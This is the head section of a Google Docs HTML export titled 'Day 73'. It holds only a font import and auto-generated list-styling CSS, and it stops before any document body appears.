<html>

<head>
	<meta content="text/html; charset=UTF-8" http-equiv="content-type">
	<title>Day 73</title>
	<style type="text/css">
		@import url('https://themes.googleusercontent.com/fonts/css?kit=-lTUqgJg2dxbe4D7B5DEID164ctO4cAXGRkC_ZwBWlzm74GqoUREvGx3nvtIBwYUN4duVc9C58uwPiY8_59Fz1glShGb2z8aYvkXhanuV51dRFcTRu26wTfOscNetZMQzn7HzOq77rru4daWN6__gA');

		.lst-kix_t8twi5tix7m3-4>li {
			counter-increment: lst-ctn-kix_t8twi5tix7m3-4
		}

		.lst-kix_5bbn6o1fums7-8>li:before {
			content: ""counter(lst-ctn-kix_5bbn6o1fums7-8, lower-roman) ". "
		}

		.lst-kix_5bbn6o1fums7-5>li:before {
			content: ""counter(lst-ctn-kix_5bbn6o1fums7-5, lower-roman) ". "
		}

		.lst-kix_n6wv8d8mqg4j-2>li {
			counter-increment: lst-ctn-kix_n6wv8d8mqg4j-2
		}

		.lst-kix_5bbn6o1fums7-6>li:before {
			content: ""counter(lst-ctn-kix_5bbn6o1fums7-6, decimal) ". "
		}

		.lst-kix_5bbn6o1fums7-7>li:before {
			content: ""counter(lst-ctn-kix_5bbn6o1fums7-7, lower-latin) ". "
		}

		.lst-kix_5lp3gqbxm2h8-1>li:before {
			content: "\0025cb  "
		}

		ul.lst-kix_c8glqpz4x2ma-8 {
			list-style-type: none
		}

		.lst-kix_5lp3gqbxm2h8-2>li:before {
			content: "\0025a0  "
		}

		.lst-kix_5lp3gqbxm2h8-3>li:before {
			content: "\0025cf  "
		}

		ul.lst-kix_c8glqpz4x2ma-3 {
			list-style-type: none
		}

		ul.lst-kix_c8glqpz4x2ma-2 {
			list-style-type: none
		}

		ul.lst-kix_c8glqpz4x2ma-1 {
			list-style-type: none
		}

		ul.lst-kix_c8glqpz4x2ma-0 {
			list-style-type: none
		}

		.lst-kix_5lp3gqbxm2h8-4>li:before {
			content: "\0025cb  "
		}

		.lst-kix_5lp3gqbxm2h8-6>li:before {
			content: "\0025cf  "
		}

		ul.lst-kix_c8glqpz4x2ma-7 {
			list-style-type: none
		}

		ul.lst-kix_c8glqpz4x2ma-6 {
			list-style-type: none
		}

		ol.lst-kix_avc0gcoxesrz-7.start {
			counter-reset: lst-ctn-kix_avc0gcoxesrz-7 0
		}

		.lst-kix_571au0wapsr5-0>li {
			counter-increment: lst-ctn-kix_571au0wapsr5-0
		}

		ul.lst-kix_c8glqpz4x2ma-5 {
			list-style-type: none
		}

		ul.lst-kix_c8glqpz4x2ma-4 {
			list-style-type: none
		}

		.lst-kix_5lp3gqbxm2h8-5>li:before {
			content: "\0025a0  "
		}

		ol.lst-kix_571au0wapsr5-7 {
			list-style-type: none
		}

		ol.lst-kix_571au0wapsr5-6 {
			list-style-type: none
		}

		.lst-kix_5lp3gqbxm2h8-8>li:before {
			content: "\0025a0  "
		}

		ol.lst-kix_571au0wapsr5-8 {
			list-style-type: none
		}

		.lst-kix_pj27egx948rq-1>li {
			counter-increment: lst-ctn-kix_pj27egx948rq-1
		}

		ol.lst-kix_571au0wapsr5-3 {
			list-style-type: none
		}

		.lst-kix_fi2xbrv6fzbg-7>li {
			counter-increment: lst-ctn-kix_fi2xbrv6fzbg-7
		}

		ol.lst-kix_571au0wapsr5-2 {
			list-style-type: none
		}

		ol.lst-kix_571au0wapsr5-5 {
			list-style-type: none
		}

		ol.lst-kix_pj27egx948rq-7.start {
			counter-reset: lst-ctn-kix_pj27egx948rq-7 0
		}

		.lst-kix_5lp3gqbxm2h8-7>li:before {
			content: "\0025cb  "
		}

		ol.lst-kix_571au0wapsr5-4 {
			list-style-type: none
		}

		ol.lst-kix_5bbn6o1fums7-8.start {
			counter-reset: lst-ctn-kix_5bbn6o1fums7-8 0
		}

		ol.lst-kix_571au0wapsr5-1 {
			list-style-type: none
		}

		ol.lst-kix_571au0wapsr5-0 {
			list-style-type: none
		}

		.lst-kix_avc0gcoxesrz-6>li {
			counter-increment: lst-ctn-kix_avc0gcoxesrz-6
		}

		.lst-kix_kjisakvjzjsi-0>li:before {
			content: "\0025cf  "
		}

		.lst-kix_i6qpwdhuifir-8>li:before {
			content: "\0025a0  "
		}

		.lst-kix_fi2xbrv6fzbg-3>li {
			counter-increment: lst-ctn-kix_fi2xbrv6fzbg-3
		}

		.lst-kix_kjisakvjzjsi-3>li:before {
			content: "\0025cf  "
		}

		.lst-kix_kjisakvjzjsi-4>li:before {
			content: "\0025cb  "
		}

		.lst-kix_kjisakvjzjsi-5>li:before {
			content: "\0025a0  "
		}

		.lst-kix_i6qpwdhuifir-3>li:before {
			content: "\0025cf  "
		}

		ol.lst-kix_pj27egx948rq-7 {
			list-style-type: none
		}

		.lst-kix_kjisakvjzjsi-7>li:before {
			content: "\0025cb  "
		}

		.lst-kix_i6qpwdhuifir-2>li:before {
			content: "\0025a0  "
		}

		ol.lst-kix_pj27egx948rq-6 {
			list-style-type: none
		}

		.lst-kix_kjisakvjzjsi-6>li:before {
			content: "\0025cf  "
		}

		.lst-kix_kjisakvjzjsi-8>li:before {
			content: "\0025a0  "
		}

		ol.lst-kix_pj27egx948rq-8 {
			list-style-type: none
		}

		.lst-kix_i6qpwdhuifir-0>li:before {
			content: "\0025cf  "
		}

		ol.lst-kix_pj27egx948rq-3 {
			list-style-type: none
		}

		ol.lst-kix_pj27egx948rq-2 {
			list-style-type: none
		}

		.lst-kix_i6qpwdhuifir-1>li:before {
			content: "\0025cb  "
		}

		ol.lst-kix_pj27egx948rq-5 {
			list-style-type: none
		}

		ol.lst-kix_pj27egx948rq-4 {
			list-style-type: none
		}

		.lst-kix_t8twi5tix7m3-0>li {
			counter-increment: lst-ctn-kix_t8twi5tix7m3-0
		}

		.lst-kix_5bbn6o1fums7-1>li:before {
			content: ""counter(lst-ctn-kix_5bbn6o1fums7-1, lower-latin) ". "
		}

		.lst-kix_5bbn6o1fums7-2>li:before {
			content: ""counter(lst-ctn-kix_5bbn6o1fums7-2, lower-roman) ". "
		}

		.lst-kix_5bbn6o1fums7-0>li:before {
			content: ""counter(lst-ctn-kix_5bbn6o1fums7-0, decimal) ". "
		}

		.lst-kix_5lp3gqbxm2h8-0>li:before {
			content: "\0025cf  "
		}

		.lst-kix_5bbn6o1fums7-4>li:before {
			content: ""counter(lst-ctn-kix_5bbn6o1fums7-4, lower-latin) ". "
		}

		ul.lst-kix_i6qpwdhuifir-0 {
			list-style-type: none
		}

		.lst-kix_5bbn6o1fums7-3>li:before {
			content: ""counter(lst-ctn-kix_5bbn6o1fums7-3, decimal) ". "
		}

		ul.lst-kix_i6qpwdhuifir-2 {
			list-style-type: none
		}

		ul.lst-kix_i6qpwdhuifir-1 {
			list-style-type: none
		}

		.lst-kix_avc0gcoxesrz-2>li {
			counter-increment: lst-ctn-kix_avc0gcoxesrz-2
		}

		ul.lst-kix_i6qpwdhuifir-4 {
			list-style-type: none
		}

		ul.lst-kix_i6qpwdhuifir-3 {
			list-style-type: none
		}

		ol.lst-kix_5bbn6o1fums7-3.start {
			counter-reset: lst-ctn-kix_5bbn6o1fums7-3 0
		}

		ul.lst-kix_i6qpwdhuifir-6 {
			list-style-type: none
		}

		ol.lst-kix_q172a0nf55p3-4.start {
			counter-reset: lst-ctn-kix_q172a0nf55p3-4 0
		}

		ul.lst-kix_i6qpwdhuifir-5 {
			list-style-type: none
		}

		ol.lst-kix_avc0gcoxesrz-2.start {
			counter-reset: lst-ctn-kix_avc0gcoxesrz-2 0
		}

		ul.lst-kix_i6qpwdhuifir-8 {
			list-style-type: none
		}

		ul.lst-kix_i6qpwdhuifir-7 {
			list-style-type: none
		}

		.lst-kix_i6qpwdhuifir-4>li:before {
			content: "\0025cb  "
		}

		.lst-kix_i6qpwdhuifir-5>li:before {
			content: "\0025a0  "
		}

		.lst-kix_i6qpwdhuifir-6>li:before {
			content: "\0025cf  "
		}

		ol.lst-kix_n6wv8d8mqg4j-5.start {
			counter-reset: lst-ctn-kix_n6wv8d8mqg4j-5 0
		}

		ol.lst-kix_pj27egx948rq-2.start {
			counter-reset: lst-ctn-kix_pj27egx948rq-2 0
		}

		.lst-kix_kjisakvjzjsi-2>li:before {
			content: "\0025a0  "
		}

		.lst-kix_kjisakvjzjsi-1>li:before {
			content: "\0025cb  "
		}

		.lst-kix_i6qpwdhuifir-7>li:before {
			content: "\0025cb  "
		}

		ol.lst-kix_5bbn6o1fums7-6.start {
			counter-reset: lst-ctn-kix_5bbn6o1fums7-6 0
		}

		.lst-kix_571au0wapsr5-0>li:before {
			content: ""counter(lst-ctn-kix_571au0wapsr5-0, decimal) ". "
		}

		ul.lst-kix_2yzjaagjqxah-0 {
			list-style-type: none
		}

		.lst-kix_fi2xbrv6fzbg-0>li {
			counter-increment: lst-ctn-kix_fi2xbrv6fzbg-0
		}

		ul.lst-kix_2yzjaagjqxah-7 {
			list-style-type: none
		}

		.lst-kix_571au0wapsr5-4>li:before {
			content: ""counter(lst-ctn-kix_571au0wapsr5-4, lower-latin) ". "
		}

		ul.lst-kix_2yzjaagjqxah-8 {
			list-style-type: none
		}

		ul.lst-kix_2yzjaagjqxah-5 {
			list-style-type: none
		}

		ul.lst-kix_2yzjaagjqxah-6 {
			list-style-type: none
		}

		ul.lst-kix_2yzjaagjqxah-3 {
			list-style-type: none
		}

		.lst-kix_571au0wapsr5-6>li:before {
			content: ""counter(lst-ctn-kix_571au0wapsr5-6, decimal) ". "
		}

		ul.lst-kix_2yzjaagjqxah-4 {
			list-style-type: none
		}

		ul.lst-kix_2yzjaagjqxah-1 {
			list-style-type: none
		}

		ul.lst-kix_2yzjaagjqxah-2 {
			list-style-type: none
		}

		.lst-kix_q172a0nf55p3-2>li {
			counter-increment: lst-ctn-kix_q172a0nf55p3-2
		}

		.lst-kix_571au0wapsr5-2>li:before {
			content: ""counter(lst-ctn-kix_571au0wapsr5-2, lower-roman) ". "
		}

		ol.lst-kix_fi2xbrv6fzbg-6.start {
			counter-reset: lst-ctn-kix_fi2xbrv6fzbg-6 0
		}

		.lst-kix_avc0gcoxesrz-5>li:before {
			content: ""counter(lst-ctn-kix_avc0gcoxesrz-5, lower-roman) ". "
		}

		.lst-kix_avc0gcoxesrz-7>li:before {
			content: ""counter(lst-ctn-kix_avc0gcoxesrz-7, lower-latin) ". "
		}

		ol.lst-kix_571au0wapsr5-6.start {
			counter-reset: lst-ctn-kix_571au0wapsr5-6 0
		}

		ol.lst-kix_pj27egx948rq-1 {
			list-style-type: none
		}

		.lst-kix_avc0gcoxesrz-1>li:before {
			content: ""counter(lst-ctn-kix_avc0gcoxesrz-1, lower-latin) ". "
		}

		ol.lst-kix_pj27egx948rq-0 {
			list-style-type: none
		}

		.lst-kix_571au0wapsr5-8>li:before {
			content: ""counter(lst-ctn-kix_571au0wapsr5-8, lower-roman) ". "
		}

		ol.lst-kix_t8twi5tix7m3-1 {
			list-style-type: none
		}

		ol.lst-kix_t8twi5tix7m3-0 {
			list-style-type: none
		}

		ol.lst-kix_n6wv8d8mqg4j-3.start {
			counter-reset: lst-ctn-kix_n6wv8d8mqg4j-3 0
		}

		ol.lst-kix_t8twi5tix7m3-7 {
			list-style-type: none
		}

		ol.lst-kix_t8twi5tix7m3-6 {
			list-style-type: none
		}

		.lst-kix_t8twi5tix7m3-8>li {
			counter-increment: lst-ctn-kix_t8twi5tix7m3-8
		}

		.lst-kix_avc0gcoxesrz-3>li:before {
			content: ""counter(lst-ctn-kix_avc0gcoxesrz-3, decimal) ". "
		}

		ol.lst-kix_t8twi5tix7m3-8 {
			list-style-type: none
		}

		ol.lst-kix_t8twi5tix7m3-3 {
			list-style-type: none
		}

		ol.lst-kix_t8twi5tix7m3-2 {
			list-style-type: none
		}

		ol.lst-kix_n6wv8d8mqg4j-0.start {
			counter-reset: lst-ctn-kix_n6wv8d8mqg4j-0 0
		}

		ol.lst-kix_t8twi5tix7m3-5 {
			list-style-type: none
		}

		ol.lst-kix_t8twi5tix7m3-4 {
			list-style-type: none
		}

		.lst-kix_q172a0nf55p3-1>li {
			counter-increment: lst-ctn-kix_q172a0nf55p3-1
		}

		.lst-kix_c8glqpz4x2ma-7>li:before {
			content: "-  "
		}

		.lst-kix_t8twi5tix7m3-1>li {
			counter-increment: lst-ctn-kix_t8twi5tix7m3-1
		}

		.lst-kix_c8glqpz4x2ma-5>li:before {
			content: "-  "
		}

		.lst-kix_t8twi5tix7m3-7>li {
			counter-increment: lst-ctn-kix_t8twi5tix7m3-7
		}

		.lst-kix_c8glqpz4x2ma-1>li:before {
			content: "-  "
		}

		ol.lst-kix_571au0wapsr5-8.start {
			counter-reset: lst-ctn-kix_571au0wapsr5-8 0
		}

		.lst-kix_c8glqpz4x2ma-3>li:before {
			content: "-  "
		}

		ol.lst-kix_q172a0nf55p3-1.start {
			counter-reset: lst-ctn-kix_q172a0nf55p3-1 0
		}

		.lst-kix_q172a0nf55p3-8>li {
			counter-increment: lst-ctn-kix_q172a0nf55p3-8
		}

		.lst-kix_5bbn6o1fums7-2>li {
			counter-increment: lst-ctn-kix_5bbn6o1fums7-2
		}

		.lst-kix_pj27egx948rq-8>li {
			counter-increment: lst-ctn-kix_pj27egx948rq-8
		}

		ol.lst-kix_fi2xbrv6fzbg-8.start {
			counter-reset: lst-ctn-kix_fi2xbrv6fzbg-8 0
		}

		ol.lst-kix_pj27egx948rq-5.start {
			counter-reset: lst-ctn-kix_pj27egx948rq-5 0
		}

		.lst-kix_571au0wapsr5-4>li {
			counter-increment: lst-ctn-kix_571au0wapsr5-4
		}

		ol.lst-kix_avc0gcoxesrz-5.start {
			counter-reset: lst-ctn-kix_avc0gcoxesrz-5 0
		}

		ol.lst-kix_n6wv8d8mqg4j-7.start {
			counter-reset: lst-ctn-kix_n6wv8d8mqg4j-7 0
		}

		.lst-kix_q172a0nf55p3-8>li:before {
			content: ""counter(lst-ctn-kix_q172a0nf55p3-8, lower-roman) ". "
		}

		.lst-kix_q172a0nf55p3-7>li:before {
			content: ""counter(lst-ctn-kix_q172a0nf55p3-7, lower-latin) ". "
		}

		.lst-kix_q172a0nf55p3-4>li:before {
			content: ""counter(lst-ctn-kix_q172a0nf55p3-4, lower-latin) ". "
		}

		.lst-kix_q172a0nf55p3-6>li {
			counter-increment: lst-ctn-kix_q172a0nf55p3-6
		}

		.lst-kix_t8twi5tix7m3-3>li {
			counter-increment: lst-ctn-kix_t8twi5tix7m3-3
		}

		.lst-kix_q172a0nf55p3-3>li:before {
			content: ""counter(lst-ctn-kix_q172a0nf55p3-3, decimal) ". "
		}

		.lst-kix_fi2xbrv6fzbg-3>li:before {
			content: ""counter(lst-ctn-kix_fi2xbrv6fzbg-3, decimal) ". "
		}

		.lst-kix_n6wv8d8mqg4j-1>li {
			counter-increment: lst-ctn-kix_n6wv8d8mqg4j-1
		}

		ol.lst-kix_5bbn6o1fums7-5.start {
			counter-reset: lst-ctn-kix_5bbn6o1fums7-5 0
		}

		.lst-kix_q172a0nf55p3-0>li:before {
			content: ""counter(lst-ctn-kix_q172a0nf55p3-0, decimal) ". "
		}

		.lst-kix_fi2xbrv6fzbg-4>li:before {
			content: ""counter(lst-ctn-kix_fi2xbrv6fzbg-4, lower-latin) ". "
		}

		.lst-kix_fi2xbrv6fzbg-4>li {
			counter-increment: lst-ctn-kix_fi2xbrv6fzbg-4
		}

		.lst-kix_fi2xbrv6fzbg-7>li:before {
			content: ""counter(lst-ctn-kix_fi2xbrv6fzbg-7, lower-latin) ". "
		}

		.lst-kix_t8twi5tix7m3-5>li {
			counter-increment: lst-ctn-kix_t8twi5tix7m3-5
		}

		.lst-kix_fi2xbrv6fzbg-8>li:before {
			content: ""counter(lst-ctn-kix_fi2xbrv6fzbg-8, lower-roman) ". "
		}

		ol.lst-kix_fi2xbrv6fzbg-0.start {
			counter-reset: lst-ctn-kix_fi2xbrv6fzbg-0 0
		}

		.lst-kix_pj27egx948rq-7>li {
			counter-increment: lst-ctn-kix_pj27egx948rq-7
		}

		.lst-kix_571au0wapsr5-5>li {
			counter-increment: lst-ctn-kix_571au0wapsr5-5
		}

		.lst-kix_5bbn6o1fums7-3>li {
			counter-increment: lst-ctn-kix_5bbn6o1fums7-3
		}

		ol.lst-kix_fi2xbrv6fzbg-4.start {
			counter-reset: lst-ctn-kix_fi2xbrv6fzbg-4 0
		}

		ol.lst-kix_571au0wapsr5-5.start {
			counter-reset: lst-ctn-kix_571au0wapsr5-5 0
		}

		ol.lst-kix_5bbn6o1fums7-4.start {
			counter-reset: lst-ctn-kix_5bbn6o1fums7-4 0
		}

		.lst-kix_fi2xbrv6fzbg-0>li:before {
			content: ""counter(lst-ctn-kix_fi2xbrv6fzbg-0, decimal) ". "
		}

		.lst-kix_hkg89eyxvtvi-1>li:before {
			content: "\0025cb  "
		}

		.lst-kix_avc0gcoxesrz-5>li {
			counter-increment: lst-ctn-kix_avc0gcoxesrz-5
		}

		ol.lst-kix_571au0wapsr5-4.start {
			counter-reset: lst-ctn-kix_571au0wapsr5-4 0
		}

		.lst-kix_hkg89eyxvtvi-2>li:before {
			content: "\0025a0  "
		}

		.lst-kix_pj27egx948rq-0>li {
			counter-increment: lst-ctn-kix_pj27egx948rq-0
		}

		.lst-kix_hkg89eyxvtvi-5>li:before {
			content: "\0025a0  "
		}

		.lst-kix_pj27egx948rq-1>li:before {
			content: ""counter(lst-ctn-kix_pj27egx948rq-1, lower-latin) ". "
		}

		.lst-kix_pj27egx948rq-0>li:before {
			content: ""counter(lst-ctn-kix_pj27egx948rq-0, decimal) ". "
		}

		.lst-kix_hkg89eyxvtvi-6>li:before {
			content: "\0025cf  "
		}

		ol.lst-kix_fi2xbrv6fzbg-5.start {
			counter-reset: lst-ctn-kix_fi2xbrv6fzbg-5 0
		}

		.lst-kix_lh5aqr9xz8oa-3>li:before {
			content: "\0025cf  "
		}

		.lst-kix_571au0wapsr5-3>li:before {
			content: ""counter(lst-ctn-kix_571au0wapsr5-3, decimal) ". "
		}

		ol.lst-kix_fi2xbrv6fzbg-3 {
			list-style-type: none
		}

		ol.lst-kix_fi2xbrv6fzbg-4 {
			list-style-type: none
		}

		ol.lst-kix_fi2xbrv6fzbg-1 {
			list-style-type: none
		}

		ol.lst-kix_fi2xbrv6fzbg-2 {
			list-style-type: none
		}

		ol.lst-kix_571au0wapsr5-3.start {
			counter-reset: lst-ctn-kix_571au0wapsr5-3 0
		}

		ol.lst-kix_fi2xbrv6fzbg-0 {
			list-style-type: none
		}

		.lst-kix_pj27egx948rq-8>li:before {
			content: ""counter(lst-ctn-kix_pj27egx948rq-8, lower-roman) ". "
		}

		.lst-kix_n6wv8d8mqg4j-1>li:before {
			content: ""counter(lst-ctn-kix_n6wv8d8mqg4j-1, lower-latin) ". "
		}

		ol.lst-kix_fi2xbrv6fzbg-7 {
			list-style-type: none
		}

		ol.lst-kix_fi2xbrv6fzbg-8 {
			list-style-type: none
		}

		.lst-kix_lh5aqr9xz8oa-7>li:before {
			content: "\0025cb  "
		}

		ol.lst-kix_fi2xbrv6fzbg-5 {
			list-style-type: none
		}

		ol.lst-kix_fi2xbrv6fzbg-6 {
			list-style-type: none
		}

		ol.lst-kix_571au0wapsr5-0.start {
			counter-reset: lst-ctn-kix_571au0wapsr5-0 0
		}

		.lst-kix_pj27egx948rq-4>li:before {
			content: ""counter(lst-ctn-kix_pj27egx948rq-4, lower-latin) ". "
		}

		.lst-kix_avc0gcoxesrz-6>li:before {
			content: ""counter(lst-ctn-kix_avc0gcoxesrz-6, decimal) ". "
		}

		ol.lst-kix_n6wv8d8mqg4j-6.start {
			counter-reset: lst-ctn-kix_n6wv8d8mqg4j-6 0
		}

		.lst-kix_avc0gcoxesrz-2>li:before {
			content: ""counter(lst-ctn-kix_avc0gcoxesrz-2, lower-roman) ". "
		}

		.lst-kix_n6wv8d8mqg4j-5>li:before {
			content: ""counter(lst-ctn-kix_n6wv8d8mqg4j-5, lower-roman) ". "
		}

		ol.lst-kix_fi2xbrv6fzbg-3.start {
			counter-reset: lst-ctn-kix_fi2xbrv6fzbg-3 0
		}

		.lst-kix_avc0gcoxesrz-3>li {
			counter-increment: lst-ctn-kix_avc0gcoxesrz-3
		}

		.lst-kix_571au0wapsr5-7>li:before {
			content: ""counter(lst-ctn-kix_571au0wapsr5-7, lower-latin) ". "
		}

		.lst-kix_q172a0nf55p3-4>li {
			counter-increment: lst-ctn-kix_q172a0nf55p3-4
		}

		.lst-kix_t8twi5tix7m3-2>li:before {
			content: ""counter(lst-ctn-kix_t8twi5tix7m3-2, lower-roman) ". "
		}

		.lst-kix_c8glqpz4x2ma-6>li:before {
			content: "-  "
		}

		ol.lst-kix_5bbn6o1fums7-1.start {
			counter-reset: lst-ctn-kix_5bbn6o1fums7-1 0
		}

		.lst-kix_n6wv8d8mqg4j-6>li {
			counter-increment: lst-ctn-kix_n6wv8d8mqg4j-6
		}

		.lst-kix_c8glqpz4x2ma-2>li:before {
			content: "-  "
		}

		ol.lst-kix_5bbn6o1fums7-0.start {
			counter-reset: lst-ctn-kix_5bbn6o1fums7-0 0
		}

		ol.lst-kix_fi2xbrv6fzbg-1.start {
			counter-reset: lst-ctn-kix_fi2xbrv6fzbg-1 0
		}

		.lst-kix_fi2xbrv6fzbg-2>li {
			counter-increment: lst-ctn-kix_fi2xbrv6fzbg-2
		}

		ol.lst-kix_571au0wapsr5-1.start {
			counter-reset: lst-ctn-kix_571au0wapsr5-1 0
		}

		.lst-kix_2yzjaagjqxah-4>li:before {
			content: "\0025cb  "
		}

		.lst-kix_pj27egx948rq-5>li {
			counter-increment: lst-ctn-kix_pj27egx948rq-5
		}

		.lst-kix_571au0wapsr5-7>li {
			counter-increment: lst-ctn-kix_571au0wapsr5-7
		}

		.lst-kix_5bbn6o1fums7-5>li {
			counter-increment: lst-ctn-kix_5bbn6o1fums7-5
		}

		ol.lst-kix_n6wv8d8mqg4j-8.start {
			counter-reset: lst-ctn-kix_n6wv8d8mqg4j-8 0
		}

		.lst-kix_2yzjaagjqxah-0>li:before {
			content: "\0025cf  "
		}

		.lst-kix_571au0wapsr5-2>li {
			counter-increment: lst-ctn-kix_571au0wapsr5-2
		}

		.lst-kix_q172a0nf55p3-7>li {
			counter-increment: lst-ctn-kix_q172a0nf55p3-7
		}

		.lst-kix_5bbn6o1fums7-0>li {
			counter-increment: lst-ctn-kix_5bbn6o1fums7-0
		}

		ol.lst-kix_fi2xbrv6fzbg-2.start {
			counter-reset: lst-ctn-kix_fi2xbrv6fzbg-2 0
		}

		ol.lst-kix_571au0wapsr5-7.start {
			counter-reset: lst-ctn-kix_571au0wapsr5-7 0
		}

		.lst-kix_2yzjaagjqxah-8>li:before {
			content: "\0025a0  "
		}

		ol.lst-kix_q172a0nf55p3-5.start {
			counter-reset: lst-ctn-kix_q172a0nf55p3-5 0
		}

		ol.lst-kix_pj27egx948rq-1.start {
			counter-reset: lst-ctn-kix_pj27egx948rq-1 0
		}

		ol.lst-kix_avc0gcoxesrz-1.start {
			counter-reset: lst-ctn-kix_avc0gcoxesrz-1 0
		}

		ol.lst-kix_n6wv8d8mqg4j-4.start {
			counter-reset: lst-ctn-kix_n6wv8d8mqg4j-4 0
		}

		.lst-kix_n6wv8d8mqg4j-4>li {
			counter-increment: lst-ctn-kix_n6wv8d8mqg4j-4
		}

		.lst-kix_t8twi5tix7m3-2>li {
			counter-increment: lst-ctn-kix_t8twi5tix7m3-2
		}

		ol.lst-kix_5bbn6o1fums7-3 {
			list-style-type: none
		}

		ol.lst-kix_571au0wapsr5-2.start {
			counter-reset: lst-ctn-kix_571au0wapsr5-2 0
		}

		ol.lst-kix_5bbn6o1fums7-2 {
			list-style-type: none
		}

		ol.lst-kix_5bbn6o1fums7-1 {
			list-style-type: none
		}

		ol.lst-kix_5bbn6o1fums7-0 {
			list-style-type: none
		}

		ol.lst-kix_5bbn6o1fums7-2.start {
			counter-reset: lst-ctn-kix_5bbn6o1fums7-2 0
		}

		.lst-kix_t8twi5tix7m3-3>li:before {
			content: ""counter(lst-ctn-kix_t8twi5tix7m3-3, decimal) ". "
		}

		.lst-kix_t8twi5tix7m3-4>li:before {
			content: ""counter(lst-ctn-kix_t8twi5tix7m3-4, lower-latin) ". "
		}

		.lst-kix_t8twi5tix7m3-6>li:before {
			content: ""counter(lst-ctn-kix_t8twi5tix7m3-6, decimal) ". "
		}

		.lst-kix_t8twi5tix7m3-5>li:before {
			content: ""counter(lst-ctn-kix_t8twi5tix7m3-5, lower-roman) ". "
		}

		.lst-kix_t8twi5tix7m3-7>li:before {
			content: ""counter(lst-ctn-kix_t8twi5tix7m3-7, lower-latin) ". "
		}

		ol.lst-kix_5bbn6o1fums7-7 {
			list-style-type: none
		}

		ol.lst-kix_5bbn6o1fums7-6 {
			list-style-type: none
		}

		ol.lst-kix_5bbn6o1fums7-5 {
			list-style-type: none
		}

		ol.lst-kix_5bbn6o1fums7-4 {
			list-style-type: none
		}

		.lst-kix_t8twi5tix7m3-8>li:before {
			content: ""counter(lst-ctn-kix_t8twi5tix7m3-8, lower-roman) ". "
		}

		.lst-kix_t8twi5tix7m3-6>li {
			counter-increment: lst-ctn-kix_t8twi5tix7m3-6
		}

		ol.lst-kix_5bbn6o1fums7-8 {
			list-style-type: none
		}

		.lst-kix_571au0wapsr5-6>li {
			counter-increment: lst-ctn-kix_571au0wapsr5-6
		}

		.lst-kix_5bbn6o1fums7-7>li {
			counter-increment: lst-ctn-kix_5bbn6o1fums7-7
		}

		.lst-kix_avc0gcoxesrz-8>li {
			counter-increment: lst-ctn-kix_avc0gcoxesrz-8
		}

		.lst-kix_pj27egx948rq-3>li {
			counter-increment: lst-ctn-kix_pj27egx948rq-3
		}

		.lst-kix_q172a0nf55p3-0>li {
			counter-increment: lst-ctn-kix_q172a0nf55p3-0
		}

		.lst-kix_q172a0nf55p3-3>li {
			counter-increment: lst-ctn-kix_q172a0nf55p3-3
		}

		ol.lst-kix_avc0gcoxesrz-8.start {
			counter-reset: lst-ctn-kix_avc0gcoxesrz-8 0
		}

		.lst-kix_lh5aqr9xz8oa-2>li:before {
			content: "\0025a0  "
		}

		ul.lst-kix_kjisakvjzjsi-8 {
			list-style-type: none
		}

		ul.lst-kix_kjisakvjzjsi-5 {
			list-style-type: none
		}

		.lst-kix_n6wv8d8mqg4j-8>li {
			counter-increment: lst-ctn-kix_n6wv8d8mqg4j-8
		}

		ul.lst-kix_kjisakvjzjsi-4 {
			list-style-type: none
		}

		ul.lst-kix_kjisakvjzjsi-7 {
			list-style-type: none
		}

		ul.lst-kix_kjisakvjzjsi-6 {
			list-style-type: none
		}

		ol.lst-kix_n6wv8d8mqg4j-5 {
			list-style-type: none
		}

		ol.lst-kix_n6wv8d8mqg4j-6 {
			list-style-type: none
		}

		ol.lst-kix_n6wv8d8mqg4j-3 {
			list-style-type: none
		}

		ol.lst-kix_n6wv8d8mqg4j-4 {
			list-style-type: none
		}

		.lst-kix_lh5aqr9xz8oa-0>li:before {
			content: "  "
		}

		.lst-kix_lh5aqr9xz8oa-8>li:before {
			content: "\0025a0  "
		}

		ol.lst-kix_n6wv8d8mqg4j-7 {
			list-style-type: none
		}

		ol.lst-kix_pj27egx948rq-8.start {
			counter-reset: lst-ctn-kix_pj27egx948rq-8 0
		}

		ol.lst-kix_n6wv8d8mqg4j-8 {
			list-style-type: none
		}

		.lst-kix_n6wv8d8mqg4j-2>li:before {
			content: ""counter(lst-ctn-kix_n6wv8d8mqg4j-2, lower-roman) ". "
		}

		.lst-kix_pj27egx948rq-5>li:before {
			content: ""counter(lst-ctn-kix_pj27egx948rq-5, lower-roman) ". "
		}

		.lst-kix_pj27egx948rq-7>li:before {
			content: ""counter(lst-ctn-kix_pj27egx948rq-7, lower-latin) ". "
		}

		ol.lst-kix_n6wv8d8mqg4j-1 {
			list-style-type: none
		}

		.lst-kix_n6wv8d8mqg4j-0>li:before {
			content: ""counter(lst-ctn-kix_n6wv8d8mqg4j-0, decimal) ". "
		}

		ol.lst-kix_n6wv8d8mqg4j-2 {
			list-style-type: none
		}

		.lst-kix_n6wv8d8mqg4j-4>li:before {
			content: ""counter(lst-ctn-kix_n6wv8d8mqg4j-4, lower-latin) ". "
		}

		ol.lst-kix_n6wv8d8mqg4j-0 {
			list-style-type: none
		}

		ul.lst-kix_kjisakvjzjsi-1 {
			list-style-type: none
		}

		.lst-kix_avc0gcoxesrz-1>li {
			counter-increment: lst-ctn-kix_avc0gcoxesrz-1
		}

		.lst-kix_lh5aqr9xz8oa-6>li:before {
			content: "\0025cf  "
		}

		ul.lst-kix_kjisakvjzjsi-0 {
			list-style-type: none
		}

		ul.lst-kix_kjisakvjzjsi-3 {
			list-style-type: none
		}

		.lst-kix_pj27egx948rq-3>li:before {
			content: ""counter(lst-ctn-kix_pj27egx948rq-3, decimal) ". "
		}

		ul.lst-kix_kjisakvjzjsi-2 {
			list-style-type: none
		}

		.lst-kix_lh5aqr9xz8oa-4>li:before {
			content: "\0025cb  "
		}

		.lst-kix_n6wv8d8mqg4j-8>li:before {
			content: ""counter(lst-ctn-kix_n6wv8d8mqg4j-8, lower-roman) ". "
		}

		.lst-kix_n6wv8d8mqg4j-6>li:before {
			content: ""counter(lst-ctn-kix_n6wv8d8mqg4j-6, decimal) ". "
		}

		ol.lst-kix_avc0gcoxesrz-3.start {
			counter-reset: lst-ctn-kix_avc0gcoxesrz-3 0
		}

		.lst-kix_avc0gcoxesrz-0>li {
			counter-increment: lst-ctn-kix_avc0gcoxesrz-0
		}

		ol.lst-kix_t8twi5tix7m3-8.start {
			counter-reset: lst-ctn-kix_t8twi5tix7m3-8 0
		}

		.lst-kix_t8twi5tix7m3-1>li:before {
			content: ""counter(lst-ctn-kix_t8twi5tix7m3-1, lower-latin) ". "
		}

